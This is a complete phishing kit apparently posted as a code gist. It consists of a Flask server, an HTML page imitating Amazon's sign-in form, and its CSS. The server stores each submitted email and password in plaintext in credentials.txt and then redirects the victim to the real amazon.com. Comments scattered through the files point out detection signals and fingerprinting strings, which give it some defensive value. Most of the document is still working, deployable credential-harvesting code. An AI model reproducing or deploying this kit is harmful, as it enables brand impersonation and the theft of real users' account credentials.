Created
February 4, 2024 02:04
An AWS Flask phishing application for harvesting credentials from mobile and desktop device logins.
#!/usr/bin/env python3 | |
from flask import Flask, render_template, request, redirect | |
import os | |
# AWS Flask phishing application for harvesting credentials from mobile and desktop device logins. | |
# For the application to work, place the index.html file the templates directory and the style.css file in the static directory | |
# Flask application object; the two routes below are registered on it.
app = Flask(__name__) | |
# Specify absolute path for the file | |
# BASE_DIR is the directory that contains this script, so the capture log is
# always credentials.txt beside the script, whatever the working directory.
# For incident response on a host found running this kit, that file is the
# primary artifact: it holds every submitted email/password pair in plaintext
# and is what identifies the accounts that need a forced reset.
BASE_DIR = os.path.abspath(os.path.dirname(__file__)) | |
CREDENTIALS_FILE = os.path.join(BASE_DIR, 'credentials.txt') | |
# Landing route: every request to "/" gets the rendered index.html template,
# which is the imitation sign-in form. No request data is read here.
@app.route('/') | |
def index(): | |
return render_template('index.html') | |
# Capture route: receives the POST sent by the form in index.html.
# Observable behaviour, useful when writing proxy or network detections:
#   - request:  POST /submit carrying the form fields "email" and "password"
#   - response: a redirect (Flask's redirect() defaults to 302) whose Location
#     is https://www.amazon.com, so the victim lands on the genuine site,
#     still signed out, immediately after submitting.
# A credential POST to one host answered by a redirect to an unrelated,
# well-known brand domain is the pattern worth alerting on.
@app.route('/submit', methods=['POST']) | |
def submit(): | |
# Always true here: the route decorator only admits POST.
if request.method == 'POST': | |
# .get() returns None for an absent field; None is then written out
# literally as the text "None" by the f-string below.
email = request.form.get('email') | |
password = request.form.get('password') | |
try: | |
# Append mode, one line per submission, stored in plaintext.
with open(CREDENTIALS_FILE, 'a') as f: | |
f.write(f"Email: {email}, Password: {password}\n") | |
except Exception as e: | |
# On a write failure the exception text is sent back in the response
# body and the redirect below is not issued.
return f"Error writing to file: {str(e)}" | |
# Redirect the user to Amazon.com after logging the credentials | |
return redirect("https://www.amazon.com") | |
# Script entry point: starts Flask's built-in server on every interface
# (0.0.0.0), port 80, with debug mode enabled. No ssl_context is passed, so
# the form and the submitted password travel over plain HTTP.
if __name__ == '__main__': | |
app.run(host='0.0.0.0', port=80, debug=True) |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>Amazon Sign In</title> | |
<!-- The brand name appears in the title although the page is served by whatever host runs the Flask app, not by the brand's own domain. A title/host mismatch is a cheap content-inspection signal. -->
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<link rel="stylesheet" href="static/style.css"> | |
<style> | |
body { | |
margin: 0; | |
padding: 0; | |
width: 100%; | |
height: 100%; | |
font-family: Arial, sans-serif; | |
} | |
#container { | |
width: 100%; | |
height: 100%; | |
display: flex; | |
flex-direction: column; | |
align-items: center; | |
justify-content: center; | |
} | |
#signInBorder { | |
padding: 20px; | |
border: 1px solid #ccc; | |
border-radius: 10px; | |
background-color: #f9f9f9; | |
} | |
</style> | |
</head> | |
<body> | |
<div id="container"> | |
<div id="signInBorder"> | |
<p id="SignInTxt"> | |
Sign in | |
</p> | |
<!-- The form posts the fields "email" and "password" to the relative path /submit, i.e. back to the same host that served this page. -->
<form action="/submit" method="post"> | |
<label> | |
<strong>Email (phone for mobile accounts)</strong> | |
<br> | |
<input type="email" id="email" name="email" value=""> | |
</label> | |
<br> | |
<label> | |
<strong>Password</strong> | |
<!-- This link and all three footer links use href="#", so none of them navigates anywhere. Dead navigation around a working login form is a common tell of a cloned page. -->
<span><a href="#" id="password">Forgot your password?</a></span> | |
<br> | |
<input type="password" id="passwordInput" name="password" value=""> | |
</label> | |
<div> | |
<button id="amazon">Sign in</button> | |
</div> | |
</form> | |
<!-- The button below sits outside the form and the page loads no script, so it has no action attached to it. -->
<div id="createAccount"> | |
<h2><span>New to Amazon?</span></h2> | |
<button id="newAccount" name="newAcct">Create your Amazon account</button> | |
</div> | |
</div> | |
</div> | |
<hr id="footer"> | |
<div class="extra"> | |
<p class="links"><a href="#" id="first">Conditions of Use</a> | |
<a href="#">Notice of Use</a> | |
<a href="#">Help</a></p> | |
<p class="links" id="special"> | |
© 1996-2024, Amazon.com, Inc. or its affiliates | |
</p> | |
</div> | |
</body> | |
</html> |
/* Stylesheet that index.html loads as static/style.css. index.html also carries inline rules for body, #container and #signInBorder. */
/* The literal values here (selector names, gradient and link colours) are static strings and can serve as content signatures when matching copies of this kit. */
#amazon{ | |
width:315px; | |
height:33px; | |
font-size:14px; | |
background: linear-gradient(#F7DEA1, #F0C14D); | |
border: 0.5px solid #aaaaaa; | |
border-radius:3px; | |
margin-top: 10px; | |
} | |
#amazon:hover{ | |
background: linear-gradient(#F5D68A, #EEBA36); | |
} | |
body { | |
font-size: 13px; | |
line-height: 19px; | |
color: #111; | |
font-family: Arial,sans-serif; | |
} | |
img{ | |
margin: auto; | |
display: block; | |
} | |
#signInBorder{ | |
position: static; | |
margin: 0 auto; | |
border-color: #DDDDDD; | |
border: 0.5px solid #DDDDDD; | |
border-radius: 3px; | |
width: 340px; | |
padding-left: 25px; | |
} | |
input{ | |
border-left-color: #DDDDDD; | |
border-right-color: #DDDDDD; | |
border-radius: 3px; | |
border-width: 0.2px; | |
height: 25px; | |
width: 315px; | |
margin-bottom: 15px; | |
} | |
input:focus{ | |
-webkit-box-shadow: 0px 0px 1.5px 1.5px rgba(231,118,0,0.9); | |
-moz-box-shadow: 0px 0px 1.5px 1.5px rgba(231,118,0,0.9); | |
box-shadow: 0px 0px 1.5px 1.5px rgba(231,118,0,0.9); | |
outline:0; | |
} | |
#SignInTxt{ | |
font-family: Arial, sans-serif; | |
font-size: 26.5px; | |
} | |
h2 { | |
color: rgb(134, 134, 134); | |
font-weight: normal; | |
letter-spacing: 1px; | |
font-size: 11.5px; | |
width: 315px; | |
text-align: center; | |
border-top: 1px solid rgba(0, 0, 0, 0.1); | |
border-bottom: 1px solid rgba(255, 255, 255, 0.3); | |
line-height: 0.1em; | |
margin: 10px 0 20px; | |
margin-bottom: 5px; | |
} | |
h2 span { | |
background:#fff; | |
padding:0 10px; | |
} | |
#createAccount{ | |
margin-top: 30px; | |
} | |
#newAccount{ | |
background: linear-gradient(#f6f7f9, #e7e9ec); | |
margin-top: 10px; | |
margin-bottom: 20px; | |
width:315px; | |
height:33px; | |
font-size:14px; | |
border: 0.5px solid #aaaaaa; | |
border-radius:3px; | |
} | |
#newAccount:hover{ | |
background: linear-gradient(#f5f6f8, #d9dce1); | |
} | |
#footer{ | |
border: 0; | |
height: 0; | |
border-top: 1px solid rgba(0, 0, 0, 0.1); | |
border-bottom: 1px solid rgba(255, 255, 255, 0.3); | |
margin-top: 30px; | |
} | |
a:link{ | |
font-size: 12px; | |
/*margin: 0 10px 0px 10px;*/ | |
margin-right: 10px; | |
text-decoration: none; | |
color: #0066c0 | |
} | |
a:hover{ | |
text-decoration: underline; | |
/* "orangergb(230, 161, 28)" is not a valid colour value, so this declaration is ignored by the browser. A verbatim quirk like this is a stable string for fingerprinting copies of the kit. */
color: orangergb(230, 161, 28); | |
} | |
a:visited{ | |
color: #0066c0; | |
} | |
.links{ | |
font-size: 10px; | |
text-align: center; | |
padding-left: 15px; | |
} | |
#password{ | |
margin-left: 125px; | |
} | |
#special{ | |
font-size: 11px; | |
} | |